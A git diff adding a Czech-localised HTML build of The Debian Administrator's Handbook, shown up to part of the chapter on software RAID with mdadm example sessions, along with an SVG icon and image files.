+  <sodipodi:namedview
+     inkscape:window-height="975"
+     inkscape:window-width="1680"
+     inkscape:pageshadow="2"
+     inkscape:pageopacity="0.0"
+     guidetolerance="10.0"
+     gridtolerance="10.0"
+     objecttolerance="10.0"
+     borderopacity="1.0"
+     bordercolor="#666666"
+     pagecolor="#ffffff"
+     id="base"
+     showgrid="false"
+     inkscape:zoom="1"
+     inkscape:cx="49.390126"
+     inkscape:cy="6.0062258"
+     inkscape:window-x="0"
+     inkscape:window-y="25"
+     inkscape:current-layer="svg5921" />
+  <defs
+     id="defs5923">
+    <linearGradient
+       inkscape:collect="always"
+       id="linearGradient2400">
+      <stop
+         style="stop-color:#fac521;stop-opacity:1;"
+         offset="0"
+         id="stop2402" />
+      <stop
+         style="stop-color:#fde7a3;stop-opacity:1"
+         offset="1"
+         id="stop2404" />
+    </linearGradient>
+    <inkscape:perspective
+       sodipodi:type="inkscape:persp3d"
+       inkscape:vp_x="0 : 20 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_z="40 : 20 : 1"
+       inkscape:persp3d-origin="20 : 13.333333 : 1"
+       id="perspective13" />
+    <inkscape:perspective
+       id="perspective2396"
+       inkscape:persp3d-origin="24 : 16 : 1"
+       inkscape:vp_z="48 : 24 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_x="0 : 24 : 1"
+       sodipodi:type="inkscape:persp3d" />
+    <inkscape:perspective
+       id="perspective2394"
+       inkscape:persp3d-origin="372.04724 : 350.78739 : 1"
+       inkscape:vp_z="744.09448 : 526.18109 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_x="0 : 526.18109 : 1"
+       sodipodi:type="inkscape:persp3d" />
+    <linearGradient
+       inkscape:collect="always"
+       xlink:href="#linearGradient2400"
+       id="linearGradient2406"
+       x1="-2684.8242"
+       y1="1639.8413"
+       x2="-2684.8242"
+       y2="1587.1559"
+       gradientUnits="userSpaceOnUse" />
+  </defs>
+  <g
+     transform="matrix(0.4536635,0,0,0.4536635,-5.1836431,-4.6889387)"
+     id="layer1">
+    <g
+       transform="translate(2745.6887,-1555.5977)"
+       id="g8304"
+       style="enable-background:new" />
+  </g>
+  <g
+     id="g3189"
+     transform="matrix(1.2987724,0,0,1.2987724,-1.4964485,-1.8271549)">
+    <path
+       style="opacity:1;fill:#2e3436;fill-opacity:1;stroke:none;stroke-opacity:1;enable-background:new"
+       id="path8034"
+       transform="matrix(0.3735251,4.0822414e-3,-4.0822414e-3,0.3735251,605.96125,-374.33682)"
+       d="M -1603,1054.4387 L -1577.0919,1027.891 L -1540,1027.4387 L -1513.4523,1053.3468 L -1513,1090.4387 L -1538.9081,1116.9864 L -1576,1117.4387 L -1602.5477,1091.5306 L -1603,1054.4387 z" />
+    <path
+       style="opacity:1;fill:url(#linearGradient2406);fill-opacity:1;stroke:none;stroke-width:0.72954363000000000;stroke-opacity:1;enable-background:new"
+       id="path8036"
+       d="M -2723.6739,1596.2775 L -2704.5623,1577.1175 L -2677.5001,1577.0833 L -2658.3401,1596.1949 L -2658.3059,1623.257 L -2677.4175,1642.417 L -2704.4797,1642.4513 L -2723.6396,1623.3396 L -2723.6739,1596.2775 z"
+       transform="matrix(0.4536635,0,0,0.4536635,1240.4351,-710.40684)" />
+    <path
+       transform="translate(6.7837002e-6,-8.8630501e-6)"
+       id="path3178"
+       d="M 13.46875,5.0625 L 4.8125,13.78125 L 4.8125,16.625 L 13.46875,7.9375 L 25.75,7.90625 L 34.4375,16.59375 L 34.4375,13.71875 L 25.75,5.0625 L 13.46875,5.0625 z"
+       style="opacity:1;fill:#fde8a6;fill-opacity:1;stroke:none;stroke-width:0.72954363;stroke-opacity:1;enable-background:new" />
+    <path
+       id="path4412"
+       style="fill:#fef2cb;fill-opacity:1;stroke:#fef2cb;stroke-width:0.9430126;stroke-linecap:round;stroke-linejoin:round;stroke-opacity:1"
+       d="M 23.308501,28.806303 C 23.308501,30.239154 22.087319,31.313792 20.231121,31.313792 L 20.198559,31.313792 C 18.358657,31.313792 17.121188,30.239154 17.121188,28.806303 C 17.121188,27.308327 18.391219,26.282537 20.231121,26.282537 C 22.054757,26.282537 23.27593,27.308327 23.308501,28.806303 z M 22.982851,24.507759 L 24.057489,11.351592 L 16.355915,11.351592 L 17.430553,24.507759 L 22.982851,24.507759 z" />
+    <path
+       id="path4414"
+       style="fill:#2e3436"
+       d="M 22.732962,27.86025 C 22.732962,29.293101 21.51178,30.36774 19.655592,30.36774 L 19.623029,30.36774 C 17.783118,30.36774 16.545659,29.293101 16.545659,27.86025 C 16.545659,26.362275 17.81568,25.336485 19.655592,25.336485 C 21.479218,25.336485 22.7004,26.362275 22.732962,27.86025 z M 22.407312,23.561697 L 23.48195,10.40553 L 15.780385,10.40553 L 16.855023,23.561697 L 22.407312,23.561697 z" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/watermark-draft.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/watermark-draft.png
new file mode 100644
index 000000000..d98d95a8f
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/watermark-draft.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/yellow.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/yellow.png
new file mode 100644
index 000000000..223865d77
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/yellow.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html b/publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html
new file mode 100644
index 000000000..4652fc167
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/advanced-administration.html
@@ -0,0 +1,1279 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 12. Advanced Administration</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.rtc-services.html"
+        title="11.8. Real-Time Communication Services" /><link
+        rel="next"
+        href="sect.virtualization.html"
+        title="12.2. Virtualization" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/advanced-administration.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-services.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtualization.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="advanced-administration"></a>Kapitola 12. Advanced Administration</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="advanced-administration.html#sect.raid-and-lvm">12.1. RAID and LVM</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.raid-soft">12.1.1. Software RAID</a></span></dt><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.lvm">12.1.2. LVM</a></span></dt><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.raid-or-lvm">12.1.3. RAID or LVM?</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.virtualization.html">12.2. Virtualization</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html#sect.xen">12.2.1. Xen</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html#sect.lxc">12.2.2. LXC</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html#id-1.15.5.14">12.2.3. Virtualization with KVM</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.automated-installation.html">12.3. Automated Installation</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html#sect.fai">12.3.1. Fully Automatic Installer (FAI)</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html#sect.d-i-preseeding">12.3.2. Preseeding Debian-Installer</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html#sect.simple-cdd">12.3.3. Simple-CDD: The All-In-One Solution</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.monitoring.html">12.4. Monitoring</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.monitoring.html#sect.munin">12.4.1. Setting Up Munin</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.monitoring.html#sect.nagios">12.4.2. Setting Up Nagios</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		This chapter revisits some aspects we already described, with a different perspective: instead of installing one single computer, we will study mass-deployment systems; instead of creating RAID or LVM volumes at install time, we'll learn to do it by hand so we can later revise our initial choices. Finally, we will discuss monitoring tools and virtualization techniques. As a consequence, this chapter is more particularly targeting professional administrators, and focuses somewhat less on individuals responsible for their home network.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.raid-and-lvm"></a>12.1. RAID and LVM</h2></div></div></div><div
+            class="para">
+			<a
+              class="xref"
+              href="installation.html">4 – „<em>Installation</em>“</a> presented these technologies from the point of view of the installer, and how it integrated them to make their deployment easy from the start. After the initial installation, an administrator must be able to handle evolving storage space needs without having to resort to an expensive reinstallation. They must therefore understand the required tools for manipulating RAID and LVM volumes.
+		</div><div
+            class="para">
+			RAID and LVM are both techniques to abstract the mounted volumes from their physical counterparts (actual hard-disk drives or partitions thereof); the former secures the data against hardware failure by introducing redundancy, the latter makes volume management more flexible and independent of the actual size of the underlying disks. In both cases, the system ends up with new block devices, which can be used to create filesystems or swap space, without necessarily having them mapped to one physical disk. RAID and LVM come from quite different backgrounds, but their functionality can overlap somewhat, which is why they are often mentioned together.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>PERSPECTIVE</em></span> Btrfs combines LVM and RAID</strong></p></div></div></div><div
+              class="para">
+			While LVM and RAID are two distinct kernel subsystems that come between the disk block devices and their filesystems, <span
+                class="emphasis"><em>btrfs</em></span> is a new filesystem, initially developed at Oracle, that purports to combine the featuresets of LVM and RAID and much more. It is mostly functional, and although it is still tagged “experimental” because its development is incomplete (some features aren't implemented yet), it has already seen some use in production environments. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://btrfs.wiki.kernel.org/">http://btrfs.wiki.kernel.org/</a></div>
+		</div><div
+              class="para">
+			Among the noteworthy features are the ability to take a snapshot of a filesystem tree at any point in time. This snapshot copy doesn't initially use any disk space, the data only being duplicated when one of the copies is modified. The filesystem also handles transparent compression of files, and checksums ensure the integrity of all stored data.
+		</div></div><div
+            class="para">
+			In both the RAID and LVM cases, the kernel provides a block device file, similar to the ones corresponding to a hard disk drive or a partition. When an application, or another part of the kernel, requires access to a block of such a device, the appropriate subsystem routes the block to the relevant physical layer. Depending on the configuration, this block can be stored on one or several physical disks, and its physical location may not be directly correlated to the location of the block in the logical device.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.raid-soft"></a>12.1.1. Software RAID</h3></div></div></div><a
+              id="id-1.15.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+				RAID means <span
+                class="emphasis"><em>Redundant Array of Independent Disks</em></span>. The goal of this system is to prevent data loss in case of hard disk failure. The general principle is quite simple: data are stored on several physical disks instead of only one, with a configurable level of redundancy. Depending on this amount of redundancy, and even in the event of an unexpected disk failure, data can be losslessly reconstructed from the remaining disks.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> <span
+                          class="foreignphrase"><em
+                            class="foreignphrase">Independent</em></span> or <span
+                          class="foreignphrase"><em
+                            class="foreignphrase">inexpensive</em></span>?</strong></p></div></div></div><div
+                class="para">
+				The I in RAID initially stood for <span
+                  class="emphasis"><em>inexpensive</em></span>, because RAID allowed a drastic increase in data safety without requiring investing in expensive high-end disks. Probably due to image concerns, however, it is now more customarily considered to stand for <span
+                  class="emphasis"><em>independent</em></span>, which doesn't have the unsavory flavour of cheapness.
+			</div></div><div
+              class="para">
+				RAID can be implemented either by dedicated hardware (RAID modules integrated into SCSI or SATA controller cards) or by software abstraction (the kernel). Whether hardware or software, a RAID system with enough redundancy can transparently stay operational when a disk fails; the upper layers of the stack (applications) can even keep accessing the data in spite of the failure. Of course, this “degraded mode” can have an impact on performance, and redundancy is reduced, so a further disk failure can lead to data loss. In practice, therefore, one will strive to only stay in this degraded mode for as long as it takes to replace the failed disk. Once the new disk is in place, the RAID system can reconstruct the required data so as to return to a safe mode. The applications won't notice anything, apart from potentially reduced access speed, while the array is in degraded mode or during the reconstruction phase.
+			</div><div
+              class="para">
+				When RAID is implemented by hardware, its configuration generally happens within the BIOS setup tool, and the kernel will consider a RAID array as a single disk, which will work as a standard physical disk, although the device name may be different (depending on the driver).
+			</div><div
+              class="para">
+				We only focus on software RAID in this book.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.raid-levels"></a>12.1.1.1. Different RAID Levels</h4></div></div></div><div
+                class="para">
+					RAID is actually not a single system, but a range of systems identified by their levels; the levels differ by their layout and the amount of redundancy they provide. The more redundant, the more failure-proof, since the system will be able to keep working with more failed disks. The counterpart is that the usable space shrinks for a given set of disks; seen the other way, more disks will be needed to store a given amount of data.
+				</div><div
+                class="variablelist"><dl
+                  class="variablelist"><dt><span
+                      class="term">Linear RAID</span></dt><dd><div
+                      class="para">
+								Even though the kernel's RAID subsystem allows creating “linear RAID”, this is not proper RAID, since this setup doesn't involve any redundancy. The kernel merely aggregates several disks end-to-end and provides the resulting aggregated volume as one virtual disk (one block device). That's about its only function. This setup is rarely used by itself (see later for the exceptions), especially since the lack of redundancy means that one disk failing makes the whole aggregate, and therefore all the data, unavailable.
+							</div></dd><dt><span
+                      class="term">RAID-0</span></dt><dd><div
+                      class="para">
+								This level doesn't provide any redundancy either, but disks aren't simply stuck on end one after another: they are divided in <span
+                        class="emphasis"><em>stripes</em></span>, and the blocks on the virtual device are stored on stripes on alternating physical disks. In a two-disk RAID-0 setup, for instance, even-numbered blocks of the virtual device will be stored on the first physical disk, while odd-numbered blocks will end up on the second physical disk.
+							</div><div
+                      class="para">
+								This system doesn't aim at increasing reliability, since (as in the linear case) the availability of all the data is jeopardized as soon as one disk fails, but at increasing performance: during sequential access to large amounts of contiguous data, the kernel will be able to read from both disks (or write to them) in parallel, which increases the data transfer rate. However, RAID-0 use is shrinking, its niche being filled by LVM (see later).
+							</div></dd><dt><span
+                      class="term">RAID-1</span></dt><dd><div
+                      class="para">
+								This level, also known as “RAID mirroring”, is both the simplest and the most widely used setup. In its standard form, it uses two physical disks of the same size, and provides a logical volume of the same size again. Data are stored identically on both disks, hence the “mirror” nickname. When one disk fails, the data is still available on the other. For really critical data, RAID-1 can of course be set up on more than two disks, with a direct impact on the ratio of hardware cost versus available payload space.
+							</div><div
+                      class="sidebar"><div
+                        class="titlepage"><div><div><p
+                              class="title"><strong><span
+                                  class="emphasis"><em>NOTE</em></span> Disks and cluster sizes</strong></p></div></div></div><div
+                        class="para">
+								If two disks of different sizes are set up in a mirror, the bigger one will not be fully used, since it will contain the same data as the smallest one and nothing more. The useful available space provided by a RAID-1 volume therefore matches the size of the smallest disk in the array. This still holds for RAID volumes with a higher RAID level, even though redundancy is stored differently.
+							</div><div
+                        class="para">
+								It is therefore important, when setting up RAID arrays (except for RAID-0 and “linear RAID”), to only assemble disks of identical, or very close, sizes, to avoid wasting resources.
+							</div></div><div
+                      class="sidebar"><div
+                        class="titlepage"><div><div><p
+                              class="title"><strong><span
+                                  class="emphasis"><em>NOTE</em></span> Spare disks</strong></p></div></div></div><div
+                        class="para">
+								RAID levels that include redundancy allow assigning more disks than required to an array. The extra disks are used as spares when one of the main disks fails. For instance, in a mirror of two disks plus one spare, if one of the first two disks fails, the kernel will automatically (and immediately) reconstruct the mirror using the spare disk, so that redundancy stays assured after the reconstruction time. This can be used as another kind of safeguard for critical data.
+							</div><div
+                        class="para">
+								One would be forgiven for wondering how this is better than simply mirroring on three disks to start with. The advantage of the “spare disk” configuration is that the spare disk can be shared across several RAID volumes. For instance, one can have three mirrored volumes, with redundancy assured even in the event of one disk failure, with only seven disks (three pairs, plus one shared spare), instead of the nine disks that would be required by three triplets.
+							</div></div><div
+                      class="para">
+								This RAID level, although expensive (since only half of the physical storage space, at best, is useful), is widely used in practice. It is simple to understand, and it allows very simple backups: since both disks have identical contents, one of them can be temporarily extracted with no impact on the working system. Read performance is often increased since the kernel can read half of the data on each disk in parallel, while write performance isn't too severely degraded. In case of a RAID-1 array of N disks, the data stays available even with N-1 disk failures.
+							</div></dd><dt><span
+                      class="term">RAID-4</span></dt><dd><div
+                      class="para">
+								This RAID level, not widely used, uses N disks to store useful data, and an extra disk to store redundancy information. If that disk fails, the system can reconstruct its contents from the other N. If one of the N data disks fails, the remaining N-1 combined with the “parity” disk contain enough information to reconstruct the required data.
+							</div><div
+                      class="para">
+								RAID-4 isn't too expensive since it only involves a one-in-N increase in costs and has no noticeable impact on read performance, but writes are slowed down. Furthermore, since a write to any of the N disks also involves a write to the parity disk, the latter sees many more writes than the former, and its lifespan can shorten dramatically as a consequence. Data on a RAID-4 array is safe only up to one failed disk (of the N+1).
+							</div></dd><dt><span
+                      class="term">RAID-5</span></dt><dd><div
+                      class="para">
+								RAID-5 addresses the asymmetry issue of RAID-4: parity blocks are spread over all of the N+1 disks, with no single disk having a particular role.
+							</div><div
+                      class="para">
+								Read and write performance are identical to RAID-4. Here again, the system stays functional with up to one failed disk (of the N+1), but no more.
+							</div></dd><dt><span
+                      class="term">RAID-6</span></dt><dd><div
+                      class="para">
+								RAID-6 can be considered an extension of RAID-5, where each series of N blocks involves two redundancy blocks, and each such series of N+2 blocks is spread over N+2 disks.
+							</div><div
+                      class="para">
+								This RAID level is slightly more expensive than the previous two, but it brings some extra safety since up to two drives (of the N+2) can fail without compromising data availability. The counterpart is that write operations now involve writing one data block and two redundancy blocks, which makes them even slower.
+							</div></dd><dt><span
+                      class="term">RAID-1+0</span></dt><dd><div
+                      class="para">
+								This isn't strictly speaking, a RAID level, but a stacking of two RAID groupings. Starting from 2×N disks, one first sets them up by pairs into N RAID-1 volumes; these N volumes are then aggregated into one, either by “linear RAID” or (increasingly) by LVM. This last case goes farther than pure RAID, but there's no problem with that.
+							</div><div
+                      class="para">
+								RAID-1+0 can survive multiple disk failures: up to N in the 2×N array described above, provided that at least one disk keeps working in each of the RAID-1 pairs.
+							</div><div
+                      class="sidebar"><a
+                        xmlns=""
+                        id="sidebar.raid-10"></a><div
+                        class="titlepage"><div><div><p
+                              class="title"><strong><span
+                                  class="emphasis"><em>GOING FURTHER</em></span> RAID-10</strong></p></div></div></div><div
+                        class="para">
+								RAID-10 is generally considered a synonym of RAID-1+0, but a Linux specificity makes it actually a generalization. This setup allows a system where each block is stored on two different disks, even with an odd number of disks, the copies being spread out along a configurable model.
+							</div><div
+                        class="para">
+								Performances will vary depending on the chosen repartition model and redundancy level, and of the workload of the logical volume.
+							</div></div></dd></dl></div><div
+                class="para">
+					Obviously, the RAID level will be chosen according to the constraints and requirements of each application. Note that a single computer can have several distinct RAID arrays with different configurations.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.raid-setup"></a>12.1.1.2. Setting up RAID</h4></div></div></div><a
+                id="id-1.15.4.6.9.2"
+                class="indexterm"></a><div
+                class="para">
+					Setting up RAID volumes requires the <span
+                  class="pkg pkg">mdadm</span> package; it provides the <code
+                  class="command">mdadm</code> command, which allows creating and manipulating RAID arrays, as well as scripts and tools integrating it to the rest of the system, including the monitoring system.
+				</div><div
+                class="para">
+					Our example will be a server with a number of disks, some of which are already used, the rest being available to setup RAID. We initially have the following disks and partitions:
+				</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+							the <code
+                        class="filename">sdb</code> disk, 4 GB, is entirely available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							the <code
+                        class="filename">sdc</code> disk, 4 GB, is also entirely available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdd</code> disk, only partition <code
+                        class="filename">sdd2</code> (about 4 GB) is available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							finally, a <code
+                        class="filename">sde</code> disk, still 4 GB, entirely available.
+						</div></li></ul></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>NOTE</em></span> Identifying existing RAID volumes</strong></p></div></div></div><div
+                  class="para">
+					The <code
+                    class="filename">/proc/mdstat</code> file lists existing volumes and their states. When creating a new RAID volume, care should be taken not to name it the same as an existing volume.
+				</div></div><div
+                class="para">
+					We're going to use these physical elements to build two volumes, one RAID-0 and one mirror (RAID-1). Let's start with the RAID-0 volume:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm --create /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc</code></strong>
+<code
+                  class="computeroutput">mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md0 started.
+# </code><strong
+                  class="userinput"><code>mdadm --query /dev/md0</code></strong>
+<code
+                  class="computeroutput">/dev/md0: 8.00GiB raid0 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md0</code></strong>
+<code
+                  class="computeroutput">/dev/md0:
+        Version : 1.2
+  Creation Time : Wed May  6 09:24:34 2015
+     Raid Level : raid0
+     Array Size : 8387584 (8.00 GiB 8.59 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:24:34 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+     Chunk Size : 512K
+
+           Name : mirwiz:0  (local to host mirwiz)
+           UUID : bb085b35:28e821bd:20d697c9:650152bb
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       16        0      active sync   /dev/sdb
+       1       8       32        1      active sync   /dev/sdc
+# </code><strong
+                  class="userinput"><code>mkfs.ext4 /dev/md0</code></strong>
+<code
+                  class="computeroutput">mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 2095104 4k blocks and 524288 inodes
+Filesystem UUID: fff08295-bede-41a9-9c6a-8c7580e520a6
+Superblock backups stored on blocks: 
+        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
+
+Allocating group tables: done                            
+Writing inode tables: done                            
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </code><strong
+                  class="userinput"><code>mkdir /srv/raid-0</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mount /dev/md0 /srv/raid-0</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/raid-0</code></strong>
+<code
+                  class="computeroutput">Filesystem      Size  Used Avail Use% Mounted on
+/dev/md0        7.9G   18M  7.4G   1% /srv/raid-0
+</code></pre><div
+                class="para">
+					The <code
+                  class="command">mdadm --create</code> command requires several parameters: the name of the volume to create (<code
+                  class="filename">/dev/md*</code>, with MD standing for <span
+                  class="foreignphrase"><em
+                    class="foreignphrase">Multiple Device</em></span>), the RAID level, the number of disks (which is compulsory despite being mostly meaningful only with RAID-1 and above), and the physical drives to use. Once the device is created, we can use it like we'd use a normal partition, create a filesystem on it, mount that filesystem, and so on. Note that our creation of a RAID-0 volume on <code
+                  class="filename">md0</code> is nothing but coincidence, and the numbering of the array doesn't need to be correlated to the chosen amount of redundancy. It's also possible to create named RAID arrays, by giving <code
+                  class="command">mdadm</code> parameters such as <code
+                  class="filename">/dev/md/linear</code> instead of <code
+                  class="filename">/dev/md0</code>.
+				</div><div
+                class="para">
+					Creation of a RAID-1 follows a similar fashion, the differences only being noticeable after the creation:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm --create /dev/md1 --level=1 --raid-devices=2 /dev/sdd2 /dev/sde</code></strong>
+<code
+                  class="computeroutput">mdadm: Note: this array has metadata at the start and
+    may not be suitable as a boot device.  If you plan to
+    store '/boot' on this device please ensure that
+    your boot-loader understands md/v1.x metadata, or use
+    --metadata=0.90
+mdadm: largest drive (/dev/sdd2) exceeds size (4192192K) by more than 1%
+Continue creating array? </code><strong
+                  class="userinput"><code>y</code></strong>
+<code
+                  class="computeroutput">mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md1 started.
+# </code><strong
+                  class="userinput"><code>mdadm --query /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1: 4.00GiB raid1 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+        Version : 1.2
+  Creation Time : Wed May  6 09:30:19 2015
+     Raid Level : raid1
+     Array Size : 4192192 (4.00 GiB 4.29 GB)
+  Used Dev Size : 4192192 (4.00 GiB 4.29 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:30:40 2015
+          State : clean, resyncing (PENDING) 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       1       8       64        1      active sync   /dev/sde
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+          State : clean
+[...]
+</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> RAID, disks and partitions</strong></p></div></div></div><div
+                  class="para">
+					As illustrated by our example, RAID devices can be constructed out of disk partitions, and do not require full disks.
+				</div></div><div
+                class="para">
+					A few remarks are in order. First, <code
+                  class="command">mdadm</code> notices that the physical elements have different sizes; since this implies that some space will be lost on the bigger element, a confirmation is required.
+				</div><div
+                class="para">
+					More importantly, note the state of the mirror. The normal state of a RAID mirror is that both disks have exactly the same contents. However, nothing guarantees this is the case when the volume is first created. The RAID subsystem will therefore provide that guarantee itself, and there will be a synchronization phase as soon as the RAID device is created. After some time (the exact amount will depend on the actual size of the disks…), the RAID array switches to the “active” or “clean” state. Note that during this reconstruction phase, the mirror is in a degraded mode, and redundancy isn't assured. A disk failing during that risk window could lead to losing all the data. Large amounts of critical data, however, are rarely stored on a freshly created RAID array before its initial synchronization. Note that even in degraded mode, the <code
+                  class="filename">/dev/md1</code> is usable, and a filesystem can be created on it, as well as some data copied on it.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> Starting a mirror in degraded mode</strong></p></div></div></div><div
+                  class="para">
+					Sometimes two disks are not immediately available when one wants to start a RAID-1 mirror, for instance because one of the disks one plans to include is already used to store the data one wants to move to the array. In such circumstances, it is possible to deliberately create a degraded RAID-1 array by passing <code
+                    class="filename">missing</code> instead of a device file as one of the arguments to <code
+                    class="command">mdadm</code>. Once the data have been copied to the “mirror”, the old disk can be added to the array. A synchronization will then take place, giving us the redundancy that was wanted in the first place.
+				</div></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> Setting up a mirror without synchronization</strong></p></div></div></div><div
+                  class="para">
+					RAID-1 volumes are often created to be used as a new disk, often considered blank. The actual initial contents of the disk is therefore not very relevant, since one only needs to know that the data written after the creation of the volume, in particular the filesystem, can be accessed later.
+				</div><div
